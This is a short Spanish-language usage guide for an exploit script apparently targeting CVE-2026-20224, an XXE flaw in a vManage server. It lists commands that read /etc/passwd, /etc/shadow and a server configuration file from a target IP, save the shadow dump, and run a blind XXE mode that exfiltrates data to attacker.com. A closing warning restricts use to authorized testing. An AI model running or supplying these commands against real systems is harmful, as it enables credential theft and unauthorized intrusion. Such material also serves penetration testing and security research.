# 1. Lectura básica de /etc/passwd
python3 cve-2026-20224.py -t 192.168.100.50 -f /etc/passwd

# 2. Lectura de archivos de configuración
python3 cve-2026-20224.py -t 192.168.100.50 -f /opt/vmanage/conf/vmanage-server.properties

# 3. Guardar resultado en archivo
python3 cve-2026-20224.py -t 192.168.100.50 -f /etc/shadow -o shadow_dump.txt

# 4. Usar HTTP en lugar de HTTPS
python3 cve-2026-20224.py -t 192.168.100.50 -f /etc/passwd --no-ssl

# 5. Blind XXE con exfiltración OOB
python3 cve-2026-20224.py -t 192.168.100.50 -f /etc/passwd --blind --callback http://attacker.com:8080

⚠️ Advertencia
esta herramienta es extremadamente peligrosa y solo debe usarse:
En sistemas donde tengas autorización explícita por escrito
Para pruebas de penetración autorizadas
Para investigación de seguridad en entornos controlados
El uso no autorizado constituye un delito informático bajo leyes como la CFAA (EE.UU.) y regulaciones similares en otros países.
